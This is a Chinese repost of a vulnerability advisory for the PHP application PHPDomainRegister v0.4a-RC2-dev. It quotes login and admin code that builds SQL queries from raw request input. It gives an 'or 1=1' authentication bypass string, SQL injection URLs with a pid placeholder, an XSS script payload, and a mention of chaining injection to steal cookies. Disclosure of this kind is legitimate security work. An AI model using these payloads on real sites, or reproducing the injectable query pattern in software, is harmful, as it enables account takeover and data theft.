PHPDomainRegister v0.4a-RC2-dev多个缺陷及修复 - 网站安

标题：PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS] 作者：Or4nG.M4n 下载地址：http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar 致谢: +----------------------------------+ | xSs m4n i-Hmx Cyber-Crystal | | Dr.Bnned ahwak2000 sa^Dev!L | +----------------------------------+ SQL Auth Bypass 缺陷位置: class_AjaxLogin.php line 73 function is_login() { <<<<==== 1 include ('config.php'); <<<<==== 2 if(isset($_POST['username'])) { <<<<==== 3 $_SESSION['username'] = $_POST['username']; <<<<==== 4 $password = $_POST['password']; <<<<==== 5 $strSQL = <<<<==== 6 "SELECT * FROM `".$_SQL_PREFIX . $USER_Table_Name."` WHERE `LOGIN_NAME` = '".$_SESSION['username']."' AND password = md5('".$password."');"; <<<<==== 7 $result = mysql _query ($strSQL); <<<<==== 8 $row = mysql_fetch_row($result); <<<<==== 9 $exist = count($row); <<<<==== 10 if($exist >=2) { $this->jscript_location(); } <<<<==== 11 [jscript_location] function jscript_location() { <<<<==== 12 $this->set_session(); <<<<==== 13 echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14 测试方法: just login as = > admin ' or 1=1 # SQL injection 缺陷位置 admin/index.php line 212 $sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1 $getpack = mysql_query($sql); <<<<==== 2 line 1079 showPacket($pid); <<<<==== 3 缺陷代码 index.php line 617 $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1 $result = mysql_query($SQL); <<<<==== 2 测试方法: http://HdhCmsTest2cto测试数据 /index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details admin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie Cross Site Scrpting [xss] admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did12620

更新时间：2022-09-13 阅读：38次